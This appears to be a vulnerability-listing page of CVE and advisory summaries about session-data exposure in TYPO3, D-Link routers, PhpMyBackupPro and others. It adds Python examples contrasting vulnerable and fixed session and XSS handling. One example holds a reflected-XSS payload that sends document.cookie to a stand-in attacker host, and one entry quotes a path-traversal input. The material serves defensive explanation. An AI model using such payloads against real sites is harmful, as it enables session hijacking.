CVE-2024-8471
Cross-Site Scripting (XSS) vulnerability whereby user-controlled input is not sufficiently encoded. Exploitation of this vulnerability could allow an attacker to retrieve the session details of an authenticated user through the JOBID and USERNAME parameters in /jobportal/process.php...
PT-2024-39038 · Unknown · Job Portal
Name of the Vulnerable Software and Affected Versions: Job Portal, affected versions not specified. Description: A Cross-Site Scripting (XSS) issue exists due to insufficient encoding of user-controlled input. This could allow an attacker to retrieve the session details of an authenticated...
CVE-2024-33994
Cross-Site Scripting XSS vulnerability in School Event Management System affecting version 1.0. An attacker could create a specially crafted URL and send it to a victim to obtain their session details via the 'view' parameter in '/event/index.php'...
CVE-2024-33993
Cross-Site Scripting XSS vulnerability in School Event Management System affecting version 1.0. An attacker could create a specially crafted URL and send it to a victim to obtain their session details via the 'view' parameter in '/candidate/index.php'...
PT-2024-25625 · Unknown · School Management System
Name of the Vulnerable Software and Affected Versions: School Event Management System version 1.0. Description: The issue is a Cross-Site Scripting (XSS) vulnerability. An attacker could create a specially crafted URL and send it to a victim to obtain their session details via the view...
School Event Management System Cross-Site Scripting Vulnerability
School Event Management System is a school event management system. A cross-site scripting vulnerability exists in School Event Management System version 1.0. An attacker can create a specially crafted URL and send it to a victim to obtain their session details via the "view" parameter in...
An access-control deficiency in Zoho ManageEngine ADAudit Plus, Windows Active Directory management and reporting software, allows an attacker to view data recorded by other users' sessions.
The vulnerability in Zoho ManageEngine ADAudit Plus, Windows Active Directory (AD) management and reporting software, is related to access-control deficiencies. Exploiting it could allow an attacker to view data recorded by other users' sessions...
A vulnerability in the GNOME Remote Desktop remote connection package, related to session data elements being provided to the wrong session, allows an attacker to gain unauthorized access to protected information.
The vulnerability in the GNOME Remote Desktop remote connection package lies in session data elements being provided to the wrong session. Exploiting it could allow a remote attacker to gain unauthorized access to protected information...
Session Data Exposure
TYPO3 is vulnerable to session data exposure. The vulnerability is due to session data of authenticated frontend users being transformed into an anonymous user session during logout, allowing the next user to access previous session data...
CVE-2024-29175
Dell PowerProtect Data Domain, versions prior to 7.13.0.0, LTS 7.7.5.40 and LTS 7.10.1.30, contain a weak cryptographic algorithm vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to a man-in-the-middle attack that exposes sensitive session...
udn News Information Disclosure Vulnerability
udn News is a news application from China United News udn Inc. An information disclosure vulnerability exists in udn News versions prior to 4.20.1: the application writes the user's session to a logcat log during login, where a malicious attacker can retrieve it and use it to log in...
VulnCheck KEV: CVE-2024-0769
D-Link DIR-859 routers contain a path traversal vulnerability in the file /hedwig.cgi of the component HTTP POST Request Handler. Manipulation of the argument service with the input ../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml allows for the leakage of session data potentially enabling...
Denial Of Service (DoS)
TYPO3 is vulnerable to Denial Of Service DoS. The vulnerability is due to improper validation of anonymous user sessions in the built-in record registration functionality using recs URL parameters, allowing attackers to create an arbitrary amount of individual session-data records in the database...
PT-2024-37301 · Unknown · Soar Cloud Hr Portal
Name of the Vulnerable Software and Affected Versions: Soar Cloud HR Portal, affected versions not specified. Description: The issue concerns notification emails sent by Soar Cloud HR Portal, which contain a link with embedded session data. These emails are sent without using an encrypted...
GHSA-G585-CRJF-VHWQ TYPO3 Denial of Service in Frontend Record Registration
TYPO3's built-in record registration functionality (aka basic shopping cart) using recs URL parameters is vulnerable to denial of service. Because it fails to properly ensure that anonymous user sessions are valid, attackers can use this vulnerability to create an arbitrary amount of individual...
GHSA-QR5F-6FCV-W69Q Typo3 Security Misconfiguration in Frontend Session Handling
It has been discovered that session data of properly authenticated and logged-in frontend users is kept and transformed into an anonymous user session during the logout process. This way the next user using the same client application gains access to previous session data...
GHSA-82VP-JR39-4J2J TYPO3 Security Misconfiguration in Frontend Session Handling
It has been discovered that session data of properly authenticated and logged-in frontend users is kept and transformed into an anonymous user session during the logout process. This way the next user using the same client application gains access to previous session data...
TYPO3 Denial of Service in Frontend Record Registration
TYPO3's built-in record registration functionality (aka "basic shopping cart") using recs URL parameters is vulnerable to denial of service. Because it fails to properly ensure that anonymous user sessions are valid, attackers can use this vulnerability to create an arbitrary amount of individual...
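The two TYPO3 frontend-session weaknesses listed above (session data surviving logout as an anonymous session, and record registration that persists data for any client-supplied session) share one root cause: the server trusts the session identifier it is handed instead of the session it actually issued. The following is an added example, not TYPO3's own code, using a minimal in-memory session store to show each weakness beside a fixed version. The session-id format, the store API and the per-session record cap are assumptions made for illustration.

```python
"""Added example (not TYPO3's code): an in-memory session store showing the two
TYPO3 frontend-session weaknesses, each beside a fixed version.

Assumptions (not from the advisories): the session-id format, the store API and
the record cap are made up here for illustration.
"""
import secrets
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class Session:
    user: Optional[str] = None                   # None = anonymous session
    data: dict = field(default_factory=dict)     # per-user private data
    records: list = field(default_factory=list)  # "recs" shopping-cart entries


class SessionStore:
    MAX_RECORDS_PER_SESSION = 50  # assumed cap, not a TYPO3 value

    def __init__(self):
        self._sessions: dict = {}

    def create(self) -> str:
        """Issue a fresh anonymous session with a random, server-chosen id."""
        sid = secrets.token_hex(16)
        self._sessions[sid] = Session()
        return sid

    def login(self, sid: str, user: str, private: dict) -> None:
        s = self._sessions[sid]
        s.user = user
        s.data.update(private)

    def get(self, sid: str) -> Optional[Session]:
        return self._sessions.get(sid)

    # --- logout -----------------------------------------------------------
    def logout_vulnerable(self, sid: str) -> str:
        """Mirrors the advisory: the authenticated session is demoted to an
        anonymous one but its data survives, so the next user of the same
        browser (same cookie value) can still read it."""
        s = self._sessions[sid]
        s.user = None
        return sid

    def logout_fixed(self, sid: str) -> str:
        """Discard the whole server-side session and issue a fresh, empty,
        anonymous one under a new id; the old cookie value stops resolving."""
        self._sessions.pop(sid, None)
        return self.create()

    # --- record registration ("recs" URL parameter) -----------------------
    def register_record_vulnerable(self, sid: str, rec: str) -> None:
        """Mirrors the DoS advisory: any client-supplied session id is accepted,
        so an attacker can mint unlimited ids and fill the store."""
        s = self._sessions.setdefault(sid, Session())
        s.records.append(rec)

    def register_record_fixed(self, sid: str, rec: str) -> bool:
        """Only persist for a session this server actually issued, and cap the
        per-session record count. Returns False when the request is rejected."""
        s = self._sessions.get(sid)
        if s is None or len(s.records) >= self.MAX_RECORDS_PER_SESSION:
            return False
        s.records.append(rec)
        return True

    def session_count(self) -> int:
        return len(self._sessions)


def demo_logout_leak() -> tuple:
    """Returns (data visible after vulnerable logout, data visible after fixed logout)."""
    store = SessionStore()
    sid = store.create()
    store.login(sid, "alice", {"email": "alice@example.test"})  # constructed sample
    leaked = dict(store.get(store.logout_vulnerable(sid)).data)

    store2 = SessionStore()
    sid2 = store2.create()
    store2.login(sid2, "alice", {"email": "alice@example.test"})
    new_sid = store2.logout_fixed(sid2)
    after_fix = dict(store2.get(new_sid).data)
    return leaked, after_fix


def demo_recs_flood(n: int = 1000) -> tuple:
    """Returns (sessions created by the vulnerable path, by the fixed path) when
    an attacker sends n requests, each carrying a fresh made-up session id."""
    vuln, fixed = SessionStore(), SessionStore()
    for i in range(n):
        forged = f"forged-{i}"
        vuln.register_record_vulnerable(forged, "item")
        fixed.register_record_fixed(forged, "item")
    return vuln.session_count(), fixed.session_count()


if __name__ == "__main__":
    print(demo_logout_leak())   # ({'email': 'alice@example.test'}, {})
    print(demo_recs_flood())    # (1000, 0)
```

The fixed logout regenerates the identifier rather than clearing fields one by one, so nothing can be left behind by accident; the fixed record registration refuses ids the server never issued, which removes the attacker's ability to grow the session table at will.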
CVE-2024-5413
A vulnerability has been discovered in PhpMyBackupPro affecting version 2.3 that could allow an attacker to execute XSS through /phpmybackuppro/scheduled.php, all parameters. This vulnerability could allow an attacker to create a specially crafted URL and send it to a victim to retrieve their...
CVE-2024-5414
A vulnerability has been discovered in PhpMyBackupPro affecting version 2.3 that could allow an attacker to execute XSS through /phpmybackuppro/getfile.php, 'view' parameter. This vulnerability could allow an attacker to create a specially crafted URL and send it to a victim to retrieve their...
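The reflected XSS entries on this page (Job Portal, School Event Management System and PhpMyBackupPro) all describe the same pattern: a query parameter such as 'view' is written into the response without output encoding, and a crafted URL sent to a logged-in victim runs script that reads their session details. The following is an added example, not code from any of those projects, showing the crafted URL, the raw reflection the advisories describe beside an encoded render, and the cookie attribute that limits the session-theft impact. The target hostname, route, page template and cookie settings are assumptions for illustration.

```python
"""Added example, not code from Job Portal, School Event Management System or
PhpMyBackupPro: reflecting a 'view' query parameter unencoded versus encoded.
The hostnames, route, HTML template and cookie attributes are assumptions."""
import html
from urllib.parse import urlsplit, parse_qs, quote

# Constructed attacker payload: ships document.cookie to an attacker-controlled
# host (placeholder name, not taken from the advisories).
PAYLOAD = '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'
# The "specially crafted URL" the advisories mention, URL-encoded as a browser
# would send it (route assumed).
CRAFTED_URL = "https://target.example/event/index.php?view=" + quote(PAYLOAD, safe="")


def view_param(url: str) -> str:
    """Server-side view of the request: the URL-decoded 'view' parameter."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("view", [""])[0]


def render_vulnerable(view: str) -> str:
    """Reflects the parameter into the page unencoded, as in the advisories."""
    return f"<h1>Viewing: {view}</h1>"


def render_fixed(view: str) -> str:
    """HTML-encodes the parameter for an element-content context; quote=True
    also escapes the quote characters an attribute context would need."""
    return f"<h1>Viewing: {html.escape(view, quote=True)}</h1>"


def contains_script_tag(page: str) -> bool:
    """Crude marker used only to contrast the two renders; not a sanitizer."""
    return "<script" in page.lower()


def session_cookie_header(session_id: str) -> str:
    """Defence in depth against the 'obtain their session details' impact:
    HttpOnly stops document.cookie from exposing the id even if script runs.
    Secure and SameSite=Lax are assumed good defaults, not advisory text."""
    return f"Set-Cookie: PHPSESSID={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/"


if __name__ == "__main__":
    v = view_param(CRAFTED_URL)
    print(render_vulnerable(v))  # script tag lands in the page verbatim
    print(render_fixed(v))       # &lt;script&gt;... is shown, not executed
```

Encoding is context-specific: html.escape is right for element content and quoted attributes, but a parameter placed inside a script block, a URL or a CSS value needs that context's own encoder, which is why a single global filter on input is not a substitute for encoding at the point of output.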